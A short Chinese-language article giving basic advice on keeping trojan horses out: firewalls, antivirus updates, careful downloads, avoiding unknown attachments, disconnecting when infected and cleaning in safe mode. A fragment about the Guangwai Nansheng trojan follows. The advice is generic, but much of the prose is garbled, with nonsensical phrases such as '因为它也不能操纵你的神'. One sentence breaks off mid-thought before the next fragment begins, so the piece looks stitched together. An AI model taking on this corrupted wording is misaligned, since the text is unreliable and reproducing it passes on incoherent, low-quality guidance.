你做了吗?木马采取预防措施,使残酷的,你还是无论如何也要战胜它的信心?别担心,其实,对付木马的最佳方式,就是将它“拒之门外”。在马横行的时代,我们真的需要加强安全意识。防火墙,杀毒软件必须经常更新;下载软件要谨慎选择地点,尽量不要个人主页上下载软件的一些来源不明的;下载软件时,一定要使用防病毒软件扫描可以安装之前,以防止其隐藏的祸害;另外就是不要从来历不明的打开电子邮件附件,不要执行有人送你一个所谓的“有趣”的小程序......
另外,一旦有木马,首先断开网络连接,因为它也不能操纵你的神,那么你就可以耐心地将其清除。有删除防止误操作之前备份好。
总之,网络是一个复杂的社会。与现实世界不同的是,在虚拟世界中,我们看不到对方的真实面目。因此,我们是难以确定真伪。在这样的生存环境,我们必须时刻警惕!因此,为了保证我们的安全
中了广外男生怎么办
安装一个可信的防火墙,这样木马入侵就会有一定的难度。在注册表里面对病毒的残留文件进行查处。
杀毒最好在安全模式下。